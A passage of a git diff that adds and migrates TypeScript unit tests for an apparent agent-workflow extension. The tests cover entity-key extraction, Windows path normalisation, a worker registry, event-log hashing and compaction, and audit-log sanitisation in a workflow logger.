+        `status "${status}" must NOT be closed so projections render [ ]`,
+      );
+    }
+  });
+});
+
+// ── extractEntityKey: underscored cmds are recognized (Wave 5 scope) ──
+// Note: hyphenated cmd normalization is in Wave 1. These tests validate
+// the underscored format that Wave 5's extractEntityKey handles directly.
+
+describe("extractEntityKey recognizes underscored cmds", () => {
+  const base: WorkflowEvent = { cmd: "", params: {}, ts: "", hash: "", actor: "agent", session_id: "" };
+
+  test("complete_task → task entity", () => {
+    const key = extractEntityKey({ ...base, cmd: "complete_task", params: { taskId: "T01" } });
+    assert.deepStrictEqual(key, { type: "task", id: "T01" });
+  });
+
+  test("complete_slice → slice entity", () => {
+    const key = extractEntityKey({ ...base, cmd: "complete_slice", params: { sliceId: "S01" } });
+    assert.deepStrictEqual(key, { type: "slice", id: "S01" });
+  });
+
+  test("plan_slice → slice_plan entity (distinct from complete)", () => {
+    const key = extractEntityKey({ ...base, cmd: "plan_slice", params: { sliceId: "S01" } });
+    assert.deepStrictEqual(key, { type: "slice_plan", id: "S01" });
+  });
+
+  test("save_decision → decision entity", () => {
+    const key = extractEntityKey({ ...base, cmd: "save_decision", params: { scope: "s", decision: "d" } });
+    assert.deepStrictEqual(key, { type: "decision", id: "s:d" });
+  });
+
+  test("unknown cmd returns null (not crash)", () => {
+    const key = extractEntityKey({ ...base, cmd: "future_unknown_cmd", params: {} });
+    assert.strictEqual(key, null);
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/windows-path-normalization.test.ts b/src/resources/extensions/gsd/tests/windows-path-normalization.test.ts
index 3b119b426..419c1cf7a 100644
--- a/src/resources/extensions/gsd/tests/windows-path-normalization.test.ts
+++ b/src/resources/extensions/gsd/tests/windows-path-normalization.test.ts
@@ -6,9 +6,9 @@
  * strips backslashes (escape characters), producing `C:Usersuserproject`.
  */
 
-import { createTestContext } from "./test-helpers.ts";
+import { test } from 'node:test';
+import assert from 'node:assert/strict';
 
-const { assertEq, assertTrue, report } = createTestContext();
 
 // ─── shellEscape + path normalization ──────────────────────────────────────
 
@@ -25,42 +25,42 @@ function bashPath(p: string): string {
 console.log("\n=== Windows backslash path normalization (#1436) ===");
 
 // Backslash paths are converted to forward slashes
-assertEq(
+assert.deepStrictEqual(
   bashPath("C:\\Users\\user\\project"),
   "'C:/Users/user/project'",
   "backslash path normalised to forward slashes in shell-escaped string",
 );
 
 // Unix paths pass through unchanged
-assertEq(
+assert.deepStrictEqual(
   bashPath("/home/user/project"),
   "'/home/user/project'",
   "Unix path unchanged",
 );
 
 // Mixed separators are normalised
-assertEq(
+assert.deepStrictEqual(
   bashPath("C:\\Users/user\\project/src"),
   "'C:/Users/user/project/src'",
   "mixed separators normalised",
 );
 
 // Paths with single quotes are still properly escaped
-assertEq(
+assert.deepStrictEqual(
   bashPath("C:\\Users\\o'brien\\project"),
   "'C:/Users/o'\\''brien/project'",
   "single quote in path is escaped after normalisation",
 );
 
 // UNC paths
-assertEq(
+assert.deepStrictEqual(
   bashPath("\\\\server\\share\\dir"),
   "'//server/share/dir'",
   "UNC path normalised",
 );
 
 // Empty string
-assertEq(
+assert.deepStrictEqual(
   bashPath(""),
   "''",
   "empty string handled",
@@ -72,14 +72,14 @@ console.log("\n=== cd command construction with normalised paths ===");
 
 const windowsCwd = "C:\\Users\\user\\project\\.gsd\\worktrees\\M001";
 const cdCommand = `cd ${bashPath(windowsCwd)}`;
-assertEq(
+assert.deepStrictEqual(
   cdCommand,
   "cd 'C:/Users/user/project/.gsd/worktrees/M001'",
   "cd command uses forward slashes for Windows worktree path",
 );
 
 // Verify the mangled form from #1436 is NOT produced
-assertTrue(
+assert.ok(
   !cdCommand.includes("C:Users"),
   "mangled path C:Usersuserproject must not appear",
 );
@@ -90,10 +90,8 @@ console.log("\n=== teardown orphan warning path formatting ===");
 
 const windowsWtDir = "C:\\Users\\user\\project\\.gsd\\worktrees\\M001";
 const helpCommand = `rm -rf "${windowsWtDir.replaceAll("\\", "/")}"`;
-assertEq(
+assert.deepStrictEqual(
   helpCommand,
   'rm -rf "C:/Users/user/project/.gsd/worktrees/M001"',
   "orphan cleanup help command uses forward slashes",
 );
-
-report();
diff --git a/src/resources/extensions/gsd/tests/worker-model-override.test.ts b/src/resources/extensions/gsd/tests/worker-model-override.test.ts
new file mode 100644
index 000000000..0b1e49edf
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/worker-model-override.test.ts
@@ -0,0 +1,48 @@
+/**
+ * Worker model override — tests for parallel.worker_model preference.
+ *
+ * Verifies validation, resolveParallelConfig pass-through, and type definitions.
+ */
+
+import test from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { join, dirname } from "node:path";
+import { fileURLToPath } from "node:url";
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+
+const typesSrc = readFileSync(join(__dirname, "..", "types.ts"), "utf-8");
+const validationSrc = readFileSync(join(__dirname, "..", "preferences-validation.ts"), "utf-8");
+const preferencesSrc = readFileSync(join(__dirname, "..", "preferences.ts"), "utf-8");
+
+// ─── Type definition ──────────────────────────────────────────────────────
+
+test("ParallelConfig includes worker_model optional field", () => {
+  assert.ok(
+    typesSrc.includes("worker_model?: string"),
+    "ParallelConfig should have optional worker_model field",
+  );
+});
+
+// ─── Validation ───────────────────────────────────────────────────────────
+
+test("validatePreferences accepts valid worker_model string", () => {
+  assert.ok(
+    validationSrc.includes("p.worker_model"),
+    "validation should check parallel.worker_model",
+  );
+  assert.ok(
+    validationSrc.includes('parallel.worker_model must be a non-empty string'),
+    "validation should reject invalid worker_model",
+  );
+});
+
+// ─── resolveParallelConfig ────────────────────────────────────────────────
+
+test("resolveParallelConfig passes through worker_model", () => {
+  assert.ok(
+    preferencesSrc.includes("worker_model: prefs?.parallel?.worker_model"),
+    "resolveParallelConfig should pass through worker_model",
+  );
+});
diff --git a/src/resources/extensions/gsd/tests/worker-registry.test.ts b/src/resources/extensions/gsd/tests/worker-registry.test.ts
index 3f09981ad..ac99e6a9a 100644
--- a/src/resources/extensions/gsd/tests/worker-registry.test.ts
+++ b/src/resources/extensions/gsd/tests/worker-registry.test.ts
@@ -5,7 +5,8 @@
  * and the hasActiveWorkers() status check.
  */
 
-import { createTestContext } from './test-helpers.ts';
+import { test } from 'node:test';
+import assert from 'node:assert/strict';
 import {
   registerWorker,
   updateWorker,
@@ -15,7 +16,6 @@ import {
   resetWorkerRegistry,
 } from '../../subagent/worker-registry.ts';
 
-const { assertEq, assertTrue, report } = createTestContext();
 
 // ─── Setup ────────────────────────────────────────────────────────────────────
 
@@ -28,15 +28,15 @@ console.log("\n=== Worker Registration ===");
 {
   resetWorkerRegistry();
   const id = registerWorker("scout", "Explore codebase", 0, 3, "batch-1");
-  assertTrue(id.startsWith("worker-"), "worker ID has correct prefix");
+  assert.ok(id.startsWith("worker-"), "worker ID has correct prefix");
   const workers = getActiveWorkers();
-  assertEq(workers.length, 1, "one worker registered");
-  assertEq(workers[0].agent, "scout", "worker agent name correct");
-  assertEq(workers[0].task, "Explore codebase", "worker task correct");
-  assertEq(workers[0].status, "running", "worker starts as running");
-  assertEq(workers[0].index, 0, "worker index correct");
-  assertEq(workers[0].batchSize, 3, "worker batch size correct");
-  assertEq(workers[0].batchId, "batch-1", "worker batch ID correct");
+  assert.deepStrictEqual(workers.length, 1, "one worker registered");
+  assert.deepStrictEqual(workers[0].agent, "scout", "worker agent name correct");
+  assert.deepStrictEqual(workers[0].task, "Explore codebase", "worker task correct");
+  assert.deepStrictEqual(workers[0].status, "running", "worker starts as running");
+  assert.deepStrictEqual(workers[0].index, 0, "worker index correct");
+  assert.deepStrictEqual(workers[0].batchSize, 3, "worker batch size correct");
+  assert.deepStrictEqual(workers[0].batchId, "batch-1", "worker batch ID correct");
 }
 
 // ─── Multiple workers in a batch ──────────────────────────────────────────────
@@ -50,14 +50,14 @@ console.log("\n=== Multiple Workers in a Batch ===");
   const id3 = registerWorker("worker", "Task C", 2, 3, "batch-2");
 
   const workers = getActiveWorkers();
-  assertEq(workers.length, 3, "three workers registered");
-  assertTrue(hasActiveWorkers(), "has active workers");
+  assert.deepStrictEqual(workers.length, 3, "three workers registered");
+  assert.ok(hasActiveWorkers(), "has active workers");
 
   const batches = getWorkerBatches();
-  assertEq(batches.size, 1, "one batch");
+  assert.deepStrictEqual(batches.size, 1, "one batch");
   const batch = batches.get("batch-2");
-  assertTrue(batch !== undefined, "batch-2 exists");
-  assertEq(batch!.length, 3, "batch has 3 workers");
+  assert.ok(batch !== undefined, "batch-2 exists");
+  assert.deepStrictEqual(batch!.length, 3, "batch has 3 workers");
 }
 
 // ─── Worker status updates ────────────────────────────────────────────────────
@@ -72,11 +72,11 @@ console.log("\n=== Worker Status Updates ===");
   updateWorker(id1, "completed");
   const workers = getActiveWorkers();
   const w1 = workers.find(w => w.id === id1);
-  assertEq(w1?.status, "completed", "worker 1 marked completed");
+  assert.deepStrictEqual(w1?.status, "completed", "worker 1 marked completed");
 
   const w2 = workers.find(w => w.id === id2);
-  assertEq(w2?.status, "running", "worker 2 still running");
-  assertTrue(hasActiveWorkers(), "still has active workers (worker 2 running)");
+  assert.deepStrictEqual(w2?.status, "running", "worker 2 still running");
+  assert.ok(hasActiveWorkers(), "still has active workers (worker 2 running)");
 }
 
 // ─── Failed worker ────────────────────────────────────────────────────────────
@@ -88,7 +88,7 @@ console.log("\n=== Failed Worker ===");
   const id = registerWorker("scout", "Task A", 0, 1, "batch-4");
   updateWorker(id, "failed");
   const workers = getActiveWorkers();
-  assertEq(workers[0].status, "failed", "worker marked failed");
+  assert.deepStrictEqual(workers[0].status, "failed", "worker marked failed");
 }
 
 // ─── Multiple batches ─────────────────────────────────────────────────────────
@@ -102,9 +102,9 @@ console.log("\n=== Multiple Batches ===");
   registerWorker("researcher", "Task C", 0, 1, "batch-6");
 
   const batches = getWorkerBatches();
-  assertEq(batches.size, 2, "two batches");
-  assertEq(batches.get("batch-5")!.length, 2, "batch-5 has 2 workers");
-  assertEq(batches.get("batch-6")!.length, 1, "batch-6 has 1 worker");
+  assert.deepStrictEqual(batches.size, 2, "two batches");
+  assert.deepStrictEqual(batches.get("batch-5")!.length, 2, "batch-5 has 2 workers");
+  assert.deepStrictEqual(batches.get("batch-6")!.length, 1, "batch-6 has 1 worker");
 }
 
 // ─── hasActiveWorkers with all completed ──────────────────────────────────────
@@ -117,7 +117,7 @@ console.log("\n=== hasActiveWorkers — all completed ===");
   const id2 = registerWorker("worker", "Task B", 1, 2, "batch-7");
   updateWorker(id1, "completed");
   updateWorker(id2, "completed");
-  assertTrue(!hasActiveWorkers(), "no active workers when all completed");
+  assert.ok(!hasActiveWorkers(), "no active workers when all completed");
 }
 
 // ─── Reset clears everything ─────────────────────────────────────────────────
@@ -126,10 +126,10 @@ console.log("\n=== Reset ===");
 
 {
   registerWorker("scout", "Task", 0, 1, "batch-8");
-  assertTrue(getActiveWorkers().length > 0, "workers exist before reset");
+  assert.ok(getActiveWorkers().length > 0, "workers exist before reset");
   resetWorkerRegistry();
-  assertEq(getActiveWorkers().length, 0, "no workers after reset");
-  assertTrue(!hasActiveWorkers(), "hasActiveWorkers false after reset");
+  assert.deepStrictEqual(getActiveWorkers().length, 0, "no workers after reset");
+  assert.ok(!hasActiveWorkers(), "hasActiveWorkers false after reset");
 }
 
 // ─── Update non-existent worker is no-op ──────────────────────────────────────
@@ -140,9 +140,7 @@ console.log("\n=== Update non-existent worker ===");
   resetWorkerRegistry();
   // Should not throw
   updateWorker("nonexistent-id", "completed");
-  assertEq(getActiveWorkers().length, 0, "no workers created by updating nonexistent");
+  assert.deepStrictEqual(getActiveWorkers().length, 0, "no workers created by updating nonexistent");
 }
 
 // ─── Summary ──────────────────────────────────────────────────────────────────
-
-report();
diff --git a/src/resources/extensions/gsd/tests/workflow-events.test.ts b/src/resources/extensions/gsd/tests/workflow-events.test.ts
new file mode 100644
index 000000000..ffad719be
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/workflow-events.test.ts
@@ -0,0 +1,205 @@
+// GSD Extension — workflow-events unit tests
+// Tests appendEvent, readEvents, findForkPoint, compactMilestoneEvents.
+
+import test from 'node:test';
+import assert from 'node:assert/strict';
+import * as fs from 'node:fs';
+import * as path from 'node:path';
+import * as os from 'node:os';
+import {
+  appendEvent,
+  readEvents,
+  findForkPoint,
+  compactMilestoneEvents,
+  type WorkflowEvent,
+} from '../workflow-events.ts';
+
+function tempDir(): string {
+  return fs.mkdtempSync(path.join(os.tmpdir(), 'gsd-events-'));
+}
+
+function cleanupDir(dirPath: string): void {
+  try { fs.rmSync(dirPath, { recursive: true, force: true }); } catch { /* best effort */ }
+}
+
+function makeEvent(cmd: string, params: Record<string, unknown> = {}): Omit<WorkflowEvent, 'hash' | 'session_id'> {
+  return { cmd, params, ts: new Date().toISOString(), actor: 'agent' };
+}
+
+// ─── appendEvent ─────────────────────────────────────────────────────────
+
+test('workflow-events: appendEvent creates .gsd dir and event-log.jsonl', () => {
+  const base = tempDir();
+  try {
+    appendEvent(base, makeEvent('complete-task', { milestoneId: 'M001', taskId: 'T01' }));
+    assert.ok(fs.existsSync(path.join(base, '.gsd', 'event-log.jsonl')));
+  } finally {
+    cleanupDir(base);
+  }
+});
+
+test('workflow-events: appendEvent writes valid JSON line', () => {
+  const base = tempDir();
+  try {
+    appendEvent(base, makeEvent('complete-task', { milestoneId: 'M001', taskId: 'T01' }));
+    const content = fs.readFileSync(path.join(base, '.gsd', 'event-log.jsonl'), 'utf-8');
+    const lines = content.trim().split('\n');
+    assert.strictEqual(lines.length, 1);
+    const parsed = JSON.parse(lines[0]!) as WorkflowEvent;
+    assert.strictEqual(parsed.cmd, 'complete-task');
+    assert.strictEqual(parsed.actor, 'agent');
+    assert.strictEqual(typeof parsed.hash, 'string');
+    assert.strictEqual(parsed.hash.length, 16);
+  } finally {
+    cleanupDir(base);
+  }
+});
+
+test('workflow-events: appendEvent appends multiple events', () => {
+  const base = tempDir();
+  try {
+    appendEvent(base, makeEvent('complete-task', { taskId: 'T01' }));
+    appendEvent(base, makeEvent('complete-slice', { sliceId: 'S01' }));
+    const events = readEvents(path.join(base, '.gsd', 'event-log.jsonl'));
+    assert.strictEqual(events.length, 2);
+    assert.strictEqual(events[0]!.cmd, 'complete-task');
+    assert.strictEqual(events[1]!.cmd, 'complete-slice');
+  } finally {
+    cleanupDir(base);
+  }
+});
+
+test('workflow-events: same cmd+params → same hash (deterministic)', () => {
+  const base = tempDir();
+  try {
+    appendEvent(base, makeEvent('plan-task', { milestoneId: 'M001', sliceId: 'S01' }));
+    appendEvent(base, makeEvent('plan-task', { milestoneId: 'M001', sliceId: 'S01' }));
+    const events = readEvents(path.join(base, '.gsd', 'event-log.jsonl'));
+    assert.strictEqual(events[0]!.hash, events[1]!.hash, 'identical cmd+params produce identical hash');
+  } finally {
+    cleanupDir(base);
+  }
+});
+
+test('workflow-events: different params → different hash', () => {
+  const base = tempDir();
+  try {
+    appendEvent(base, makeEvent('complete-task', { taskId: 'T01' }));
+    appendEvent(base, makeEvent('complete-task', { taskId: 'T02' }));
+    const events = readEvents(path.join(base, '.gsd', 'event-log.jsonl'));
+    assert.notStrictEqual(events[0]!.hash, events[1]!.hash, 'different params produce different hash');
+  } finally {
+    cleanupDir(base);
+  }
+});
+
+// ─── readEvents ──────────────────────────────────────────────────────────
+
+test('workflow-events: readEvents returns [] for non-existent file', () => {
+  const result = readEvents('/nonexistent/path/event-log.jsonl');
+  assert.deepStrictEqual(result, []);
+});
+
+test('workflow-events: readEvents skips corrupted lines', () => {
+  const base = tempDir();
+  try {
+    fs.mkdirSync(path.join(base, '.gsd'), { recursive: true });
+    const logPath = path.join(base, '.gsd', 'event-log.jsonl');
+    // Write a valid line, a corrupted line, and another valid line
+    fs.writeFileSync(logPath,
+      '{"cmd":"complete-task","params":{},"ts":"2026-01-01T00:00:00Z","hash":"abcd1234abcd1234","actor":"agent"}\n' +
+      'NOT VALID JSON {{{{\n' +
+      '{"cmd":"plan-task","params":{},"ts":"2026-01-01T00:00:01Z","hash":"1234abcd1234abcd","actor":"system"}\n',
+    );
+    const events = readEvents(logPath);
+    assert.strictEqual(events.length, 2, 'should return 2 valid events, skipping the corrupted line');
+    assert.strictEqual(events[0]!.cmd, 'complete-task');
+    assert.strictEqual(events[1]!.cmd, 'plan-task');
+  } finally {
+    cleanupDir(base);
+  }
+});
+
+// ─── findForkPoint ───────────────────────────────────────────────────────
+
+test('workflow-events: findForkPoint returns -1 for two empty logs', () => {
+  assert.strictEqual(findForkPoint([], []), -1);
+});
+
+test('workflow-events: findForkPoint returns -1 when first events differ', () => {
+  const e1 = { cmd: 'a', params: {}, ts: '', hash: 'hash1', actor: 'agent' } as WorkflowEvent;
+  const e2 = { cmd: 'b', params: {}, ts: '', hash: 'hash2', actor: 'agent' } as WorkflowEvent;
+  assert.strictEqual(findForkPoint([e1], [e2]), -1);
+});
+
+test('workflow-events: findForkPoint returns 0 when only first event is common', () => {
+  const common = { cmd: 'a', params: {}, ts: '', hash: 'hash1', actor: 'agent' } as WorkflowEvent;
+  const eA = { cmd: 'b', params: {}, ts: '', hash: 'hash2', actor: 'agent' } as WorkflowEvent;
+  const eB = { cmd: 'c', params: {}, ts: '', hash: 'hash3', actor: 'agent' } as WorkflowEvent;
+  // logA: [common, eA], logB: [common, eB]
+  assert.strictEqual(findForkPoint([common, eA], [common, eB]), 0);
+});
+
+test('workflow-events: findForkPoint returns last common index for prefix relationship', () => {
+  const e1 = { cmd: 'a', params: {}, ts: '', hash: 'h1', actor: 'agent' } as WorkflowEvent;
+  const e2 = { cmd: 'b', params: {}, ts: '', hash: 'h2', actor: 'agent' } as WorkflowEvent;
+  const e3 = { cmd: 'c', params: {}, ts: '', hash: 'h3', actor: 'agent' } as WorkflowEvent;
+  // logA is a prefix of logB → fork point is last index of logA
+  assert.strictEqual(findForkPoint([e1, e2], [e1, e2, e3]), 1);
+});
+
+test('workflow-events: findForkPoint handles equal logs', () => {
+  const e1 = { cmd: 'a', params: {}, ts: '', hash: 'h1', actor: 'agent' } as WorkflowEvent;
+  const e2 = { cmd: 'b', params: {}, ts: '', hash: 'h2', actor: 'agent' } as WorkflowEvent;
+  assert.strictEqual(findForkPoint([e1, e2], [e1, e2]), 1);
+});
+
+// ─── compactMilestoneEvents ──────────────────────────────────────────────
+
+test('workflow-events: compactMilestoneEvents returns { archived: 0 } when no matching events', () => {
+  const base = tempDir();
+  try {
+    appendEvent(base, makeEvent('complete-task', { milestoneId: 'M002', taskId: 'T01' }));
+    const result = compactMilestoneEvents(base, 'M001');
+    assert.strictEqual(result.archived, 0);
+  } finally {
+    cleanupDir(base);
+  }
+});
+
+test('workflow-events: compactMilestoneEvents archives milestone events', () => {
+  const base = tempDir();
+  try {
+    appendEvent(base, makeEvent('complete-task', { milestoneId: 'M001', taskId: 'T01' }));
+    appendEvent(base, makeEvent('complete-task', { milestoneId: 'M001', taskId: 'T02' }));
+    appendEvent(base, makeEvent('complete-task', { milestoneId: 'M002', taskId: 'T03' }));
+
+    const result = compactMilestoneEvents(base, 'M001');
+    assert.strictEqual(result.archived, 2, 'should archive 2 M001 events');
+
+    // Archive file should exist
+    const archivePath = path.join(base, '.gsd', 'event-log-M001.jsonl.archived');
+    assert.ok(fs.existsSync(archivePath), 'archive file should exist');
+    const archived = readEvents(archivePath);
+    assert.strictEqual(archived.length, 2, 'archive file should have 2 events');
+
+    // Active log should retain only M002 event
+    const active = readEvents(path.join(base, '.gsd', 'event-log.jsonl'));
+    assert.strictEqual(active.length, 1, 'active log should have 1 remaining event');
+    assert.strictEqual((active[0]!.params as { milestoneId?: string }).milestoneId, 'M002');
+  } finally {
+    cleanupDir(base);
+  }
+});
+
+test('workflow-events: compactMilestoneEvents empties active log when all events are from milestone', () => {
+  const base = tempDir();
+  try {
+    appendEvent(base, makeEvent('complete-task', { milestoneId: 'M001', taskId: 'T01' }));
+    compactMilestoneEvents(base, 'M001');
+    const active = readEvents(path.join(base, '.gsd', 'event-log.jsonl'));
+    assert.strictEqual(active.length, 0, 'active log should be empty after full compact');
+  } finally {
+    cleanupDir(base);
+  }
+});
diff --git a/src/resources/extensions/gsd/tests/workflow-logger-audit.test.ts b/src/resources/extensions/gsd/tests/workflow-logger-audit.test.ts
new file mode 100644
index 000000000..1c63b60bd
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/workflow-logger-audit.test.ts
@@ -0,0 +1,123 @@
+// GSD Extension — Workflow Logger Audit Persistence Tests
+// Validates error-only persistence, sanitization, and warning ephemeral behavior.
+
+import { describe, test, beforeEach, afterEach } from "node:test";
+import assert from "node:assert/strict";
+import { mkdtempSync, mkdirSync, readFileSync, existsSync, rmSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+
+import {
+  logWarning,
+  logError,
+  setLogBasePath,
+  _resetLogs,
+  peekLogs,
+  drainLogs,
+} from "../workflow-logger.ts";
+
+function createTempProject(): string {
+  const tmp = mkdtempSync(join(tmpdir(), "gsd-wflog-test-"));
+  mkdirSync(join(tmp, ".gsd"), { recursive: true });
+  return tmp;
+}
+
+function readAuditLines(basePath: string): Record<string, unknown>[] {
+  const auditPath = join(basePath, ".gsd", "audit-log.jsonl");
+  if (!existsSync(auditPath)) return [];
+  const content = readFileSync(auditPath, "utf-8").trim();
+  if (!content) return [];
+  return content.split("\n").map((line) => JSON.parse(line));
+}
+
+describe("workflow-logger audit persistence", () => {
+  let tmp: string;
+
+  beforeEach(() => {
+    tmp = createTempProject();
+    _resetLogs();
+    setLogBasePath(tmp);
+  });
+
+  afterEach(() => {
+    _resetLogs();
+    setLogBasePath(null as unknown as string);
+    rmSync(tmp, { recursive: true, force: true });
+  });
+
+  test("logError persists to audit-log.jsonl", () => {
+    logError("engine", "something broke");
+    const lines = readAuditLines(tmp);
+    assert.equal(lines.length, 1);
+    assert.equal(lines[0].severity, "error");
+    assert.equal(lines[0].component, "engine");
+  });
+
+  test("logWarning does NOT persist to audit-log.jsonl", () => {
+    logWarning("engine", "something fishy");
+    const lines = readAuditLines(tmp);
+    assert.equal(lines.length, 0, "warnings must not be persisted to audit log");
+  });
+
+  test("logWarning still appears in in-memory buffer", () => {
+    logWarning("recovery", "probe miss");
+    const entries = peekLogs();
+    assert.equal(entries.length, 1);
+    assert.equal(entries[0].severity, "warn");
+    assert.equal(entries[0].component, "recovery");
+  });
+
+  test("persisted error messages are truncated at 200 chars", () => {
+    const longMessage = "x".repeat(300);
+    logError("engine", longMessage);
+    const lines = readAuditLines(tmp);
+    assert.equal(lines.length, 1);
+    const msg = lines[0].message as string;
+    assert.ok(msg.length <= 215, `message should be truncated, got ${msg.length} chars`);
+    assert.ok(msg.endsWith("…[truncated]"));
+  });
+
+  test("persisted errors have context filtered to safe allowlist", () => {
+    logError("tool", "tool failed", {
+      fn: "saveDecisionToDb",
+      tool: "gsd_decision_save",
+      error: "SQLITE_BUSY: database is locked",
+      file: "/home/user/project/gsd.db",
+    });
+    const lines = readAuditLines(tmp);
+    assert.equal(lines.length, 1);
+    const ctx = lines[0].context as Record<string, string>;
+    assert.ok(ctx, "context should exist");
+    assert.equal(ctx.fn, "saveDecisionToDb");
+    assert.equal(ctx.tool, "gsd_decision_save");
+    assert.equal(ctx.error, "SQLITE_BUSY: database is locked", "error key should be preserved in persisted context");
+    assert.equal(ctx.file, undefined, "file key must be stripped from persisted context");
+  });
+
+  test("persisted errors preserve error key but strip other unsafe keys", () => {
+    logError("bootstrap", "ensureDbOpen failed", {
+      error: "ENOENT",
+      cwd: "/home/user/project",
+    });
+    const lines = readAuditLines(tmp);
+    assert.equal(lines.length, 1);
+    const ctx = lines[0].context as Record<string, string>;
+    assert.ok(ctx, "context should exist when error key is present");
+    assert.equal(ctx.error, "ENOENT", "error key should be preserved");
+    assert.equal(ctx.cwd, undefined, "cwd key must be stripped");
+  });
+
+  test("mixed warnings and errors only persist errors", () => {
+    logWarning("recovery", "main not found");
+    logWarning("recovery", "master not found");
+    logError("engine", "fatal failure");
+    logWarning("prompt", "cache miss");
+
+    const lines = readAuditLines(tmp);
+    assert.equal(lines.length, 1, "only the error should be persisted");
+    assert.equal(lines[0].severity, "error");
+
+    const buffered = drainLogs();
+    assert.equal(buffered.length, 4, "all entries should be in the in-memory buffer");
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/workflow-logger.test.ts b/src/resources/extensions/gsd/tests/workflow-logger.test.ts
new file mode 100644
index 000000000..68ef6710f
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/workflow-logger.test.ts
@@ -0,0 +1,379 @@
+// GSD Extension — Workflow Logger Tests
+// Tests for the centralized warning/error accumulator.
+
+import { describe, test, beforeEach, afterEach } from "node:test";
+import assert from "node:assert/strict";
+import { existsSync, readFileSync } from "node:fs";
+import { join } from "node:path";
+import { makeTempDir, cleanup } from "./test-utils.ts";
+import {
+  logWarning,
+  logError,
+  drainLogs,
+  drainAndSummarize,
+  peekLogs,
+  hasErrors,
+  hasWarnings,
+  hasAnyIssues,
+  summarizeLogs,
+  formatForNotification,
+  setLogBasePath,
+  _resetLogs,
+} from "../workflow-logger.ts";
+
+const ISO_RE = /^\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}\.\d{3}Z$/;
+
+describe("workflow-logger", () => {
+  beforeEach(() => {
+    _resetLogs();
+  });
+
+  describe("accumulation", () => {
+    test("logWarning adds an entry with severity warn", () => {
+      logWarning("engine", "test warning");
+      const entries = peekLogs();
+      assert.equal(entries.length, 1);
+      assert.equal(entries[0].severity, "warn");
+      assert.equal(entries[0].component, "engine");
+      assert.equal(entries[0].message, "test warning");
+      assert.match(entries[0].ts, ISO_RE);
+    });
+
+    test("logError adds an entry with severity error", () => {
+      logError("intercept", "blocked write", { path: "/foo/STATE.md" });
+      const entries = peekLogs();
+      assert.equal(entries.length, 1);
+      assert.equal(entries[0].severity, "error");
+      assert.equal(entries[0].component, "intercept");
+      assert.deepEqual(entries[0].context, { path: "/foo/STATE.md" });
+    });
+
+    test("accumulates multiple entries in order", () => {
+      logWarning("projection", "render failed");
+      logError("intercept", "blocked write");
+      logWarning("manifest", "write failed");
+      assert.equal(peekLogs().length, 3);
+      assert.equal(peekLogs()[0].component, "projection");
+      assert.equal(peekLogs()[1].component, "intercept");
+      assert.equal(peekLogs()[2].component, "manifest");
+    });
+
+    test("omits context field when not provided", () => {
+      logWarning("engine", "no context");
+      assert.equal("context" in peekLogs()[0], false);
+    });
+
+    test("omits context field when undefined is passed", () => {
+      logWarning("engine", "no context", undefined);
+      assert.equal("context" in peekLogs()[0], false);
+    });
+
+    test("context with special characters is stored as-is", () => {
+      logError("tool", "failed", { path: '/foo/"quoted".md', msg: "line1\nline2" });
+      assert.deepEqual(peekLogs()[0].context, {
+        path: '/foo/"quoted".md',
+        msg: "line1\nline2",
+      });
+    });
+
+    test("ts field is a valid ISO 8601 timestamp", () => {
+      logWarning("engine", "ts check");
+      assert.match(peekLogs()[0].ts, ISO_RE);
+    });
+  });
+
+  describe("drain", () => {
+    test("returns all entries and clears buffer", () => {
+      logWarning("engine", "w1");
+      logError("engine", "e1");
+      const drained = drainLogs();
+      assert.equal(drained.length, 2);
+      assert.equal(peekLogs().length, 0);
+    });
+
+    test("returns empty array when no entries", () => {
+      assert.deepEqual(drainLogs(), []);
+    });
+
+    test("second drain returns empty array", () => {
+      logWarning("engine", "w1");
+      drainLogs();
+      assert.deepEqual(drainLogs(), []);
+    });
+  });
+
+  describe("drainAndSummarize", () => {
+    test("returns summary and clears buffer atomically", () => {
+      logError("intercept", "blocked");
+      logWarning("projection", "render failed");
+      const { logs, summary } = drainAndSummarize();
+      assert.equal(logs.length, 2);
+      assert.equal(peekLogs().length, 0);
+      assert.ok(summary?.includes("1 error(s)"));
+      assert.ok(summary?.includes("1 warning(s)"));
+    });
+
+    test("returns null summary when buffer is empty", () => {
+      const { logs, summary } = drainAndSummarize();
+      assert.deepEqual(logs, []);
+      assert.equal(summary, null);
+    });
+  });
+
+  describe("hasErrors / hasWarnings / hasAnyIssues", () => {
+    test("hasErrors returns false when only warnings", () => {
+      logWarning("engine", "just a warning");
+      assert.equal(hasErrors(), false);
+      assert.equal(hasWarnings(), true);
+    });
+
+    test("hasErrors returns true when errors present", () => {
+      logWarning("engine", "warning");
+      logError("intercept", "error");
+      assert.equal(hasErrors(), true);
+    });
+
+    test("hasWarnings returns false when buffer empty", () => {
+      assert.equal(hasWarnings(), false);
+    });
+
+    test("hasWarnings returns false when buffer contains only errors", () => {
+      logError("intercept", "only an error");
+      assert.equal(hasWarnings(), false);
+      assert.equal(hasErrors(), true);
+    });
+
+    test("hasAnyIssues returns true for warnings only", () => {
+      logWarning("engine", "warn");
+      assert.equal(hasAnyIssues(), true);
+    });
+
+    test("hasAnyIssues returns true for errors only", () => {
+      logError("engine", "err");
+      assert.equal(hasAnyIssues(), true);
+    });
+
+    test("hasAnyIssues returns false when buffer empty", () => {
+      assert.equal(hasAnyIssues(), false);
+    });
+  });
+
+  describe("summarizeLogs", () => {
+    test("returns null when empty", () => {
+      assert.equal(summarizeLogs(), null);
+    });
+
+    test("summarizes errors and warnings separately", () => {
+      logError("intercept", "blocked STATE.md");
+      logWarning("projection", "render failed");
+      logWarning("manifest", "write failed");
+      const summary = summarizeLogs()!;
+      assert.ok(summary.includes("1 error(s)"));
+      assert.ok(summary.includes("blocked STATE.md"));
+      assert.ok(summary.includes("2 warning(s)"));
+    });
+
+    test("only shows errors section when no warnings", () => {
+      logError("intercept", "blocked");
+      const summary = summarizeLogs()!;
+      assert.ok(summary.includes("1 error(s)"));
+      assert.ok(!summary.includes("warning"));
+    });
+
+    test("only shows warnings section when no errors", () => {
+      logWarning("projection", "render degraded");
